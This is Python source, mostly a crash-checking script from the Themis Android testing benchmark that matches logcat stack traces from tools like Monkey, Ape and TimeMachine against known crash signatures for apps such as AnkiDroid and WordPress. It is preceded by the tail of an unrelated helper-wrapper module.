def __getattr__(self, helper_name):
if helper_name not in self._registry:
raise AttributeError(
"Helper function {} not "
"registered.".format(helper_name)
)
def scope_wrapper(*args, **kwargs):
new_kwargs = {}
if helper_name != 'arg_scope':
if len(args) > 0 and isinstance(args[0], ModelHelper):
model = args[0]
elif 'model' in kwargs:
model = kwargs['model']
else:
raise RuntimeError(
"The first input of helper function should be model. " \
"Or you can provide it in kwargs as model=<your_model>.")
new_kwargs = copy.deepcopy(model.arg_scope)
func = self._registry[helper_name]
var_names, _, varkw, _= inspect.getargspec(func)
if varkw is None:
# this helper function does not take in random **kwargs
new_kwargs = {
var_name: new_kwargs[var_name]
for var_name in var_names if var_name in new_kwargs
}
cur_scope = get_current_scope()
new_kwargs.update(cur_scope.get(helper_name, {}))
new_kwargs.update(kwargs)
return func(*args, **new_kwargs)
scope_wrapper.__name__ = helper_name
return scope_wrapper
def Register(self, helper):
name = helper.__name__
if name in self._registry:
raise AttributeError(
"Helper {} already exists. Please change your "
"helper name.".format(name)
)
self._registry[name] = helper
def has_helper(self, helper_or_helper_name):
helper_name = (
helper_or_helper_name
if isinstance(helper_or_helper_name, basestring) else
helper_or_helper_name.__name__
)
return helper_name in self._registry
sys.modules[__name__] = HelperWrapper(sys.modules[__name__])
|
cebdbb92b516bb2e2f924e14d81e1445a06c9fb0
|
e1ab23a4010a411e0435540e7a98abc6bf02352e
|
/scripts/check_crash_newmonkey.py
|
d66a709717e4e68391577771e37ab09dd53af551
|
[
"MIT"
] |
permissive
|
the-themis-benchmarks/home
|
05ef5c17d4d9c996ef37aa24336c3ef445396ff0
|
aeb0e6005c51ff2bde8c369e97c33b80e194ea4a
|
refs/heads/master
| 2023-07-05T20:17:11.192700
| 2023-07-04T09:44:17
| 2023-07-04T09:44:17
| 290,040,967
| 107
| 20
|
MIT
| 2023-07-04T09:44:18
| 2020-08-24T21:11:53
|
Python
|
UTF-8
|
Python
| false
| false
| 47,572
|
py
|
check_crash_newmonkey.py
|
# This file aims to do quick crash checking
import csv
import datetime
import os
import shutil
import subprocess
import time
from argparse import ArgumentParser, Namespace
from typing import List, Dict, Set
ALL_APPS = ['ActivityDiary', 'AmazeFileManager', 'and-bible', 'AnkiDroid', 'APhotoManager', 'commons',
'collect', 'FirefoxLite', 'Frost', 'geohashdroid', 'MaterialFBook', 'nextcloud', 'Omni-Notes',
'open-event-attendee-android', 'openlauncher', 'osmeditor4android', 'Phonograph', 'Scarlet-Notes',
'sunflower', 'WordPress']
app_crash_data = {
'AnkiDroid': {
'#4200': ['com.ichi2.libanki.Note com.ichi2.libanki.Card.note()',
'com.ichi2.async.DeckTask.doInBackgroundUpdateNote(DeckTask.java',
'com.ichi2.async.DeckTask.doInBackground(DeckTask.java'],
'#4451': [
'android.support.design.widget.CoordinatorLayout$LayoutParams cannot be cast to android.widget.RelativeLayout$LayoutParams',
'com.ichi2.anki.AbstractFlashcardViewer.initLayout(AbstractFlashcardViewer.java',
'com.ichi2.anki.AbstractFlashcardViewer.onCollectionLoaded(AbstractFlashcardViewer.java',
'com.ichi2.anki.Reviewer.onCollectionLoaded(Reviewer.java',
'com.ichi2.anki.AnkiActivity.onLoadFinished(AnkiActivity.java'],
'#5638': ['com.ichi2.libanki.Utils.stripHTMLMedia',
'com.ichi2.libanki.Utils.stripHTML'],
'#4707': ['exposed beyond app through ClipData.Item.getUri()',
'com.ichi2.anki.AnkiActivity.startActivityForResult(AnkiActivity.java',
'com.ichi2.anki.multimediacard.fields.BasicImageFieldController$2.onClick(BasicImageFieldController.java'],
'#6145': ['com.ichi2.libanki.AnkiPackageExporter.exportInto(AnkiPackageExporter.java'],
'#5756': ['Unable to start activity ComponentInfo{com.ichi2.anki/com.ichi2.anki.Reviewer}',
'com.ichi2.anki.AbstractFlashcardViewer.restoreCollectionPreferences(AbstractFlashcardViewer.java',
'com.ichi2.anki.AbstractFlashcardViewer.onCollectionLoaded(AbstractFlashcardViewer.java',
'com.ichi2.anki.AnkiActivity.startLoadingCollection(AnkiActivity.java'],
'#4977': [
"Attempt to invoke virtual method 'boolean android.support.v7.widget.SearchView.isIconified()' on a null object reference",
'com.ichi2.anki.CardBrowser$20.onPostExecute(CardBrowser.java',
'com.ichi2.async.DeckTask$TaskListener.onPostExecute(DeckTask.java',
'com.ichi2.async.DeckTask.onPostExecute(DeckTask.java']
},
'ActivityDiary': {
'#118': ['java.lang.IllegalArgumentException: position (',
'de.rampro.activitydiary.ui.generic.DetailRecyclerViewAdapter.getDiaryImageIdAt(DetailRecyclerViewAdapter.java',
'de.rampro.activitydiary.ui.history.HistoryRecyclerViewAdapter$1.onClick(HistoryRecyclerViewAdapter.java'],
'#285': ['java.lang.NumberFormatException: For input string',
'de.rampro.activitydiary.ui.settings.SettingsActivity.updateLocationAge(SettingsActivity.java',
'de.rampro.activitydiary.ui.settings.SettingsActivity.onSharedPreferenceChanged(SettingsActivity.java']
},
'geohashdroid': {
'#73': ['java.lang.RuntimeException: An error occurred while executing doInBackground()',
'java.lang.String net.exclaimindustries.geohashdroid.util.Graticule.getLatitudeString(boolean)',
'net.exclaimindustries.geohashdroid.util.HashBuilder$StockRunner.runStock(HashBuilder.java',
'net.exclaimindustries.geohashdroid.services.StockService.onHandleWork(StockService.java']
},
'and-bible': {
'#261': ['java.lang.StackOverflowError: stack size',
'org.crosswire.jsword.index.lucene.LuceneIndex.generateSearchIndexImpl(LuceneIndex.java'],
'#375': ['kotlin.TypeCastException: null cannot be cast to non-null type org.crosswire.jsword.book.Book',
'net.bible.service.history.HistoryManager.setDumpString(HistoryManager.kt',
'net.bible.android.view.activity.page.MainBibleActivity.openTab(MainBibleActivity.kt'],
'#480': ['net.bible.service.db.bookmark.BookmarkDBAdapter.updateLabel(BookmarkDBAdapter.kt',
'net.bible.android.control.bookmark.BookmarkControl.saveOrUpdateLabel(BookmarkControl.kt',
'net.bible.android.view.activity.bookmark.LabelDialogs$1.onClick(LabelDialogs.java'],
'#697': [
'Unable to start activity ComponentInfo{net.bible.android.activity/net.bible.android.view.activity.mynote.MyNotes}',
'net.bible.android.control.versification.sort.VersificationPrioritiser.getVersifications(VersificationPrioritiser.java',
'net.bible.android.control.versification.sort.ConvertibleVerseRangeComparator$Builder.withMyNotes(ConvertibleVerseRangeComparator.java'],
'#703': ['org.crosswire.jsword.index.IndexStatus org.crosswire.jsword.book.Book.getIndexStatus()',
'net.bible.android.view.activity.search.SearchIndexProgressStatus.jobFinished(SearchIndexProgressStatus.java',
'net.bible.android.view.activity.base.ProgressActivityBase$initialiseView$uiUpdaterRunnable$1.run(ProgressActivityBase.kt']
},
'AmazeFileManager': {
'#1232': ['Failure delivering result ResultInfo',
"Attempt to invoke virtual method 'java.lang.Object java.util.ArrayList.get(int)' on a null object reference",
'com.amaze.filemanager.activities.MainActivity.onActivityResult(MainActivity.java',
],
'#1558': ["com.amaze.filemanager.exceptions.StreamNotFoundException: Can't get stream",
"com.amaze.filemanager.filesystem.FileUtil.getOutputStream(FileUtil.java",
"com.amaze.filemanager.filesystem.FileUtil.isWritable(FileUtil.java",
'com.amaze.filemanager.asynchronous.asynctasks.WriteFileAbstraction.doInBackground'],
'#1796': ["java.lang.IndexOutOfBoundsException: Index:",
'com.amaze.filemanager.asynchronous.asynctasks.DeleteTask.onPostExecute(DeleteTask.java'],
'#1837': ['java.lang.IndexOutOfBoundsException: Index:',
'com.amaze.filemanager.adapters.glide.RecyclerPreloadModelProvider.getPreloadItems(RecyclerPreloadModelProvider.java',
'com.bumptech.glide.ListPreloader.preload(ListPreloader.java',
'com.bumptech.glide.integration.recyclerview.RecyclerToListViewScrollListener.onScrolled(RecyclerToListViewScrollListener.java']
},
'FirefoxLite': {
'#4881': ['org.json.JSONException: End of input at character',
'org.mozilla.rocket.util.JsonUtilsKt.toJsonArray(JsonUtils.kt',
'org.mozilla.rocket.home.contenthub.data.ContentHubRepoKt.jsonStringToTypeList(ContentHubRepo.kt',
'org.mozilla.rocket.home.contenthub.data.ContentHubRepo$getReadTypesLive$1.invoke(ContentHubRepo.kt',
'org.mozilla.rocket.extension.LiveDataExtensionKt$sam$androidx_arch_core_util_Function$0.apply(LiveDataExtension.kt)',
'org.mozilla.focus.activity.MainActivity.onStart(MainActivity.kt',
],
'#4942': [
'java.lang.RuntimeException: Cannot create an instance of class org.mozilla.rocket.home.HomeViewModel',
'java.lang.InstantiationException: java.lang.Class<org.mozilla.rocket.home.HomeViewModel> has no zero argument constructor',
'org.mozilla.focus.tabs.tabtray.TabTrayFragment.onCreateView(TabTrayFragment.java'],
'#5085': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.String android.os.BaseBundle.getString(java.lang.String)' on a null object reference",
'org.mozilla.focus.settings.SettingsFragment.onCreate(SettingsFragment.kt']
},
'open-event-attendee-android': {
'#2198': [
'org.fossasia.openevent.general.search.SearchFragment$onCreateView$3.onClick(SearchFragment.kt',
# special handling for combo, which discarded the line number on this case
# 'org.fossasia.openevent.general.search.SearchFilterFragment$setFilters$3.onClick(SearchFilterFragment.kt:127)',
'org.fossasia.openevent.general.search.type.SearchTypeFragment.<init>(SearchTypeFragment.kt']
},
'openlauncher': {
'#67': ['java.lang.SecurityException: Not allowed to change Do Not Disturb state',
'com.benny.openlauncher.util.LauncherAction.RunAction(LauncherAction.java',
'com.benny.openlauncher.activity.Home$11.onItemClick(Home.java']
},
'APhotoManager': {
'#116': ['Error inflating class de.k3b.android.widgets.EditTextPreferenceWithSummary',
'de.k3b.android.androFotoFinder.SettingsActivity.onCreate(SettingsActivity.java']
},
'sunflower': {
'#239': [
'java.lang.IllegalArgumentException: navigation destination com.google.samples.apps.sunflower:id/action_plant_list_fragment_to_plant_detail_fragment is unknown to this NavController',
'com.google.samples.apps.sunflower.adapters.PlantAdapter$createOnClickListener$1.onClick(PlantAdapter.kt']
},
'collect': {
'#3222': ["java.lang.IllegalArgumentException: column 'MAX(date)' does not exist",
'org.odk.collect.android.activities.FormChooserList.onLoadFinished(FormChooserList.java']
},
'MaterialFBook': {
'#224': ['android.content.res.Resources$NotFoundException: Resource ID #0x20b001b',
'org.chromium.ui.base.DeviceFormFactor.b(PG',
'org.chromium.ui.base.DeviceFormFactor.a(PG',
'bCE.onCreateActionMode(PG',
'org.chromium.content.browser.selection.SelectionPopupControllerImpl.y(PG',
'org.chromium.content.browser.selection.SelectionPopupControllerImpl.showSelectionMenu(PG']
},
'Omni-Notes': {
'#745': ['No virtual method fitCenter()Lcom/bumptech/glide/request/RequestOptions',
'it.feio.android.simplegallery.GalleryPagerFragment.onCreateView(GalleryPagerFragment.java']
},
'OmniNotes': {
'#745': ['No virtual method fitCenter()Lcom/bumptech/glide/request/RequestOptions',
'it.feio.android.simplegallery.GalleryPagerFragment.onCreateView(GalleryPagerFragment.java']
},
'Phonograph': {
'#112': ['com.kabouzeid.gramophone.appshortcuts.AppShortcutLauncherActivity.startServiceWithSongs']
},
'osmeditor': {
'#637': [
"Attempt to invoke interface method 'java.util.Set java.util.Map.entrySet()' on a null object reference"],
'#705': [
"android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:258)",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:244)"],
'#729': [
"android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:258)",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:244)"]
},
'Scarlet-Notes': {
'#114': ['java.lang.Exception: Invalid Search Mode',
'com.maubis.scarlet.base.support.SearchConfigKt.getNotesForMode(SearchConfig.kt',
'com.maubis.scarlet.base.support.SearchConfigKt.filterSearchWithoutFolder(SearchConfig.kt',
'com.maubis.scarlet.base.support.SearchConfigKt.unifiedSearchSynchronous(SearchConfig.kt',
'com.maubis.scarlet.base.MainActivity$unifiedSearchSynchronous$$inlined$map$lambda$1.invokeSuspend(MainActivity.kt']
},
'Frost': {
'#1323': [
"java.net.UnknownHostException: Unable to resolve host \"m.facebook.com\": No address associated with hostname",
"com.pitchedapps.frost.fragments.FrostParserFragment.reloadImpl$suspendImpl(RecyclerFragmentBase.kt",
"com.pitchedapps.frost.fragments.FrostParserFragment.reloadImpl(Unknown Source",
"com.pitchedapps.frost.fragments.RecyclerFragment$reload$2.invokeSuspend(RecyclerFragmentBase.kt"]
},
'commons': {
'#1385': ['java.lang.NullPointerException: Callable returned null'],
'#1391': ["fr.free.nrw.commons.nearby.NearbyMapFragment$8.onStateChanged(NearbyMapFragment.java"],
'#1581': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'double android.location.Location.getLatitude()' on a null object reference",
"fr.free.nrw.commons.location.LatLng.from(LatLng.java",
'fr.free.nrw.commons.location.LocationServiceManager.getLKL(LocationServiceManager.java',
'fr.free.nrw.commons.nearby.NearbyActivity.onRequestPermissionsResult(NearbyActivity.java'],
'#2123': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'android.support.v4.app.FragmentActivity android.support.v4.app.Fragment.getActivity()' on a null object reference",
'fr.free.nrw.commons.media.MediaDetailPagerFragment$MediaDetailAdapter.getItem(MediaDetailPagerFragment.java'],
'#3244': ['fr.free.nrw.commons.upload.UploadActivity.receiveInternalSharedItems(UploadActivity.java']
},
'nextcloud': {
'#1918': [
'java.lang.ClassCastException: com.owncloud.android.ui.preview.PreviewImageActivity cannot be cast to com.owncloud.android.ui.activity.FileDisplayActivity',
'com.owncloud.android.ui.preview.PreviewImageFragment.onOptionsItemSelected(PreviewImageFragment.java'],
'#4026': [
'java.lang.RuntimeException: Unable to start activity ComponentInfo{com.nextcloud.client/com.owncloud.android.ui.activity.FileDisplayActivity}',
'com.owncloud.android.ui.activity.ToolbarActivity.setupToolbar(ToolbarActivity.java',
'com.owncloud.android.ui.activity.FileDisplayActivity.onCreate(FileDisplayActivity.java'],
'#4792': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.String com.owncloud.android.datamodel.OCFile.getRemotePath()' on a null object reference",
'com.owncloud.android.ui.dialog.CreateFolderDialogFragment.onClick(CreateFolderDialogFragment.java'],
'#5173': ['android.view.MenuItem android.view.MenuItem.setVisible(boolean)',
'com.owncloud.android.ui.fragment.OCFileListFragment.onPrepareOptionsMenu(OCFileListFragment.java']
},
'WordPress': {
'#6530': ['org.wordpress.android.fluxc.store.PostStore.onAction(PostStore.java'],
'#7182': [
'org.wordpress.android.login.LoginUsernamePasswordFragment.onSiteChanged(LoginUsernamePasswordFragment.java'],
'#8659': [
'Two different ViewHolders have the same stable ID. Stable IDs in your adapter MUST BE unique and SHOULD NOT change.'],
'#10302': [
'org.wordpress.android.login.LoginBaseFormFragment.onOptionsItemSelected(LoginBaseFormFragment.java'],
'#10363': ['java.lang.IllegalStateException: itemView.findViewById(R.id.container) must not be null',
'org.wordpress.android.ui.posts.PostListItemViewHolder.<init>(PostListItemViewHolder.kt',
'org.wordpress.android.ui.posts.PostListItemViewHolder$Compact.<init>(PostListItemViewHolder.kt',
'org.wordpress.android.ui.posts.adapters.PostListAdapter.onCreateViewHolder(PostListAdapter.kt'
],
'#10547': [
'start activity ComponentInfo{org.wordpress.android/org.wordpress.android.ui.posts.EditPostActivity}: java.lang.IllegalArgumentException: PostLoadingState wrong value 6',
'org.wordpress.android.ui.posts.EditPostActivity$PostLoadingState.fromInt(EditPostActivity.java',
'org.wordpress.android.ui.posts.EditPostActivity.onCreate(EditPostActivity.java'
],
'#10876': ['in WithSelect(WithDispatch(WithViewportMatch(WithPreferredColorScheme(Component))))'],
'#11135': [
'java.lang.IllegalStateException: siteStore.getSiteBySiteI…t.getLong(EXTRA_SITE_ID)) must not be null',
'org.wordpress.android.ui.CommentFullScreenDialogFragment.onCreateView(CommentFullScreenDialogFragment.kt'],
'#11992': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'boolean org.wordpress.android.ui.FilteredRecyclerView.isRefreshing()' on a null object reference",
'org.wordpress.android.ui.reader.ReaderPostListFragment.onSaveInstanceState(ReaderPostListFragment.java']
}
}
def get_testing_result_dir(all_testing_result_dirs, app_name, issue_id):
tmp_paths = []
for result_dir_path in all_testing_result_dirs:
result_dir_basename = os.path.basename(result_dir_path)
if app_name in result_dir_basename and issue_id in result_dir_basename:
tmp_paths.append(result_dir_path)
return tmp_paths
def get_app_name(testing_result_dir):
for app_name in ALL_APPS:
if os.path.basename(testing_result_dir).startswith(app_name):
return app_name
print("Warning: cannot find app name for this testing result dir: %s" % testing_result_dir)
def get_apk_info(testing_result_dir: str, app_name: str):
base_name = os.path.basename(testing_result_dir)
target_apk_file_name = str(base_name.split(".apk")[0]) + ".apk"
target_apk_file_path = os.path.join("../" + app_name, target_apk_file_name)
get_app_package_name_cmd = "aapt dump badging " + target_apk_file_path + " | grep package | awk '{print $2}' | sed s/name=//g | sed s/\\'//g"
app_package_name = ""
try:
p = subprocess.Popen(get_app_package_name_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# clear the output
app_package_name = p.communicate()[0].decode('utf-8').strip()
print(app_package_name)
except os.error as e:
print(e)
return target_apk_file_name, app_package_name
def main(args: Namespace):
# collect all testing result dirs
all_testing_results_dirs = []
subdirs = os.listdir(args.o)
for subdir in subdirs:
# print(subdir)
subdir_path = os.path.join(args.o, subdir)
if os.path.isdir(subdir_path):
all_testing_results_dirs.append(subdir_path)
# print(all_testing_results_dirs)
# the dict only used for collecting non-target crashes
# key: the apk file name
# value: list of signatures of crash stacks
other_crashes_signature_str_dict: Dict[str, List[str]] = {}
other_crashes_complete_exception_trace_dict: Dict[str, List[List[str]]] = {}
# check crash
for app_name in app_crash_data:
if args.app_name is not None and args.app_name != app_name:
# skip unrelated apps if args.app_name is given
continue
# if args.monkey and app_name == "ActivityDiary":
# # TODO special check for Monkey's ActivityDiary [should be removed in the future]
# continue
print(args.app_name)
issue_crash_data = app_crash_data[app_name]
for issue_id in issue_crash_data:
if args.issue_id is not None and args.issue_id != issue_id:
# skip unrelated issues if args.issue_id is given
continue
issue_testing_result_dirs = get_testing_result_dir(all_testing_results_dirs,
app_name,
issue_id)
if len(issue_testing_result_dirs) == 0:
continue
log_tag_name = '[' + app_name + ', ' + issue_id + '] '
print("\n\n=========")
crash_signature_strs = issue_crash_data[issue_id]
# scanning the testing results of the given issue
for result_dir in issue_testing_result_dirs:
logcat_file_path = ""
testing_time_file_path = ""
login_file_path = ""
if args.monkey:
# Monkey
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"monkey_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.ape:
# Ape
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"ape_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.combo:
# ComboDroid
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"combo_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H-%M-%S'
if args.timemachine:
# TimeMachine
logcat_file_path = os.path.join(result_dir, "timemachine-output/crashes.log")
login_file_path = os.path.join(result_dir, "timemachine-run.log")
testing_time_file_path = os.path.join(result_dir,
"timemachine-output/run_time.log")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.humanoid:
# Humanoid
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"humanoid_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.sapienz:
# Sapienz
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"sapienz_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.qtesting:
# Q-testing
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"qtesting_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.weighted:
# Q-testing
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"weighted_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.fastbot:
# Fastbot
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"fastbot_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.wetest:
# WeTest
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"wetest_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.newmonkey:
# Newmonkey
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"newmonkey_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if os.path.exists(logcat_file_path) and os.path.exists(testing_time_file_path):
print('\n')
print(log_tag_name + 'scanning (%s) ' % os.path.basename(result_dir))
testing_time_file = open(testing_time_file_path, 'r')
lines = testing_time_file.readlines()
for line in lines:
print(log_tag_name + 'testing time: %s ' % line.strip())
if len(lines) == 0:
# double check on the file content on the testing time
print(log_tag_name + 'this run does not have recorded testing time, skip this run!')
continue
time.sleep(1)
# get the start testing datetime
if args.timemachine:
# special handle timemachine
start_testing_datetime_str = lines[0][0:19]
else:
start_testing_datetime_str = lines[0].strip()
print("the start testing time is: %s" % start_testing_datetime_str)
start_testing_datetime_obj = datetime.datetime.strptime(start_testing_datetime_str,
testing_time_datetime_str)
print("the start testing time (parsed) is: %s" % start_testing_datetime_obj)
if os.path.exists(login_file_path):
cmd = 'grep ' + "\"" + "Login SUCCESS" + "\" " + login_file_path
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# clear the output
output = p.communicate()[0].decode('utf-8').strip()
if len(output) != 0:
print(log_tag_name + "Login SUCCESS")
else:
print(log_tag_name + "Login FAIL?")
# split the logcat file into separate stack traces
crash_stack_traces: Dict[str, List[str]] = {}
logcat_file = open(logcat_file_path, 'r')
if args.timemachine:
if not args.other_crashes:
# special handle for TimeMachine (for target crash)
cache_list = []
for line in logcat_file.readlines():
if line.startswith("---"):
continue
if line.startswith("["):
time_label = line.strip()
crash_stack_traces[time_label] = cache_list
cache_list = []
else:
cache_list.append(line)
else:
# special handle for TimeMachine (for non-target crash)
fake_time_label_index = 1
fake_time_label = "fake_time_"
for line in logcat_file.readlines():
if line.startswith("---") or line.startswith("["):
fake_time_label_index += 1
fake_time_label = fake_time_label + str(fake_time_label_index)
continue
if fake_time_label not in crash_stack_traces:
crash_stack_traces[fake_time_label] = [line]
else:
crash_stack_traces[fake_time_label].append(line)
else:
for line in logcat_file.readlines():
if line.startswith("---"):
continue
res = [i for i in range(len(line)) if line.startswith(':', i)]
try:
# hot fix
time_label = line[0:res[2]] # the third ":" is the split point
except IndexError:
print("Catch IndexError when paring logcat!")
continue
if time_label not in crash_stack_traces:
crash_stack_traces[time_label] = [line]
else:
crash_stack_traces[time_label].append(line)
logcat_file.close()
if args.other_crashes:
# check the number of other crashes that were detected by-product
app_dir_name = get_app_name(result_dir)
apk_file_name, app_package_name = get_apk_info(result_dir, app_dir_name)
print("apk file name: %s" % apk_file_name)
print("apk package name: %s" % app_package_name)
if app_package_name.endswith(".debug") or app_package_name.endswith(".debug.ting"):
app_package_name = app_package_name.split(".debug")[0]
if app_package_name.endswith(".client"):
app_package_name = "com.owncloud.android"
if app_package_name.endswith(".activity"):
app_package_name = app_package_name.split(".activity")[0]
if app_package_name.endswith(".quicknote"):
app_package_name = "com.maubis.scarlet"
if app_package_name.endswith(".attendee"):
app_package_name = "org.fossasia.openevent"
for time_label in crash_stack_traces:
if args.timemachine:
# Special handling on timemachine
target_stack = crash_stack_traces[time_label]
# split the target_stack into sub exception traces
sub_exception_stacks: Dict[str, List[str]] = {}
for line in target_stack:
res = [i for i in range(len(line)) if line.startswith(':', i)]
print(line)
if len(res) < 3:
# special handling for the case like
# "AndroidRuntime: at android.os.BinderProxy.transactNative(Native Method)"
continue
else:
local_time_label = line[0:res[2]] # the third ":" is the split point
if local_time_label not in sub_exception_stacks:
sub_exception_stacks[local_time_label] = [line]
else:
sub_exception_stacks[local_time_label].append(line)
for local_time_label in sub_exception_stacks:
if "AndroidRuntime" in local_time_label or "ACRA" in local_time_label \
or "CustomActivityOnCrash" in local_time_label \
or "CrashAnrDetector" in local_time_label:
# focus on "AndroidRuntime" bugs
pass
else:
continue
uniqe_signature_of_crash_stack = ""
sub_exception_stack = sub_exception_stacks[local_time_label]
for line in sub_exception_stack:
if "at " in line and app_package_name in line:
line_without_time_label = line.replace(local_time_label + ":", "").strip()
uniqe_signature_of_crash_stack += line_without_time_label
if uniqe_signature_of_crash_stack == "":
continue
print("\n-- signature --")
print(uniqe_signature_of_crash_stack)
print("----")
if apk_file_name not in other_crashes_signature_str_dict:
other_crashes_signature_str_dict[apk_file_name] = [
uniqe_signature_of_crash_stack]
other_crashes_complete_exception_trace_dict[apk_file_name] = [
sub_exception_stack]
else:
if uniqe_signature_of_crash_stack not in other_crashes_signature_str_dict[
apk_file_name]:
# check existence
other_crashes_signature_str_dict[apk_file_name].append(
uniqe_signature_of_crash_stack)
other_crashes_complete_exception_trace_dict[apk_file_name].append(
sub_exception_stack)
else:
target_stack = crash_stack_traces[time_label]
uniqe_signature_of_crash_stack = ""
if "AndroidRuntime" in time_label or "ACRA" in time_label \
or "CustomActivityOnCrash" in time_label \
or "CrashAnrDetector" in time_label:
# focus on "AndroidRuntime" bugs
pass
else:
continue
for line in target_stack:
if "at " in line and app_package_name in line:
line_without_time_label = line.replace(time_label + ":", "").strip()
uniqe_signature_of_crash_stack += line_without_time_label
if uniqe_signature_of_crash_stack == "":
continue
print("\n-- signature --")
print(uniqe_signature_of_crash_stack)
print("----")
if apk_file_name not in other_crashes_signature_str_dict:
other_crashes_signature_str_dict[apk_file_name] = [uniqe_signature_of_crash_stack]
other_crashes_complete_exception_trace_dict[apk_file_name] = [target_stack]
else:
if uniqe_signature_of_crash_stack not in other_crashes_signature_str_dict[
apk_file_name]:
# check existence
other_crashes_signature_str_dict[apk_file_name].append(
uniqe_signature_of_crash_stack)
other_crashes_complete_exception_trace_dict[apk_file_name].append(target_stack)
# print("--")
# print(len(set(other_crashes_dict[app_name])))
# print(other_crashes_dict[app_name])
# print("--")
if apk_file_name in other_crashes_signature_str_dict:
number_of_unique_other_crashes = len(set(other_crashes_signature_str_dict[apk_file_name]))
print("#unique other crashes: %d" % number_of_unique_other_crashes)
else:
number_of_unique_other_crashes = 0
# output to final result file
if args.final_result_csv_file_path is not None:
with open(args.final_result_csv_file_path, "a") as csv_file:
writer = csv.writer(csv_file)
writer.writerow([apk_file_name, issue_id, os.path.basename(result_dir),
number_of_unique_other_crashes])
csv_file.close()
else:
# check the existence of target crashes (i.e., the critical crash we concern)
number_of_matched_crash = 0
crash_triggering_time_durations = []
for time_label in crash_stack_traces:
target_stack = crash_stack_traces[time_label]
is_matched = True
for signature_str in crash_signature_strs:
exist = False
for line in target_stack:
if signature_str in line:
exist = True
break
if exist:
continue
else:
is_matched = False
break
if is_matched:
# compute the time duration to trigger the crash
if args.timemachine:
# print("time label: %s" % time_label)
matched_datetime_str = time_label.replace("[", "").replace("]", "")
crash_triggering_datetime_obj = datetime.datetime.strptime(matched_datetime_str,
'%Y-%m-%d-%H:%M:%S')
else:
matched_datetime_str = "2020-" + time_label.split('.')[0]
crash_triggering_datetime_obj = datetime.datetime.strptime(matched_datetime_str,
'%Y-%m-%d %H:%M:%S')
tmp_time_duration_in_minutes = (
crash_triggering_datetime_obj - start_testing_datetime_obj).total_seconds() / 60
crash_triggering_time_durations.append("{:.0f}".format(tmp_time_duration_in_minutes))
number_of_matched_crash += 1
if number_of_matched_crash > 0:
print(log_tag_name + "the crash was triggered (%d) times" % number_of_matched_crash)
print(log_tag_name + "the time duration: %s (mins)" % crash_triggering_time_durations)
# if args.v:
# print('---')
# # verbose mode
# print(output)
# print('---')
# output to final result file
if args.final_result_csv_file_path is not None:
if not args.simple_format:
with open(args.final_result_csv_file_path, "a") as csv_file:
writer = csv.writer(csv_file)
writer.writerow([app_name, issue_id, os.path.basename(result_dir),
len(crash_triggering_time_durations)])
for time_duration in crash_triggering_time_durations:
writer.writerow(["", "", "", time_duration])
csv_file.close()
else:
if len(crash_triggering_time_durations) > 0:
# output in a simple format: only output triggered bugs and its first triggering time
with open(args.final_result_csv_file_path, "a") as csv_file:
writer = csv.writer(csv_file)
writer.writerow([app_name, issue_id, os.path.basename(result_dir),
len(crash_triggering_time_durations),
crash_triggering_time_durations[0]])
csv_file.close()
else:
print('\n')
print(log_tag_name + 'scanning (%s) ' % os.path.basename(result_dir))
print(log_tag_name + "Warning: logcat file or testing time file in (%s) does not exist!" %
os.path.basename(result_dir))
continue
if args.other_crashes:
total_number_of_other_crashes = 0
for apk_file_name in other_crashes_signature_str_dict:
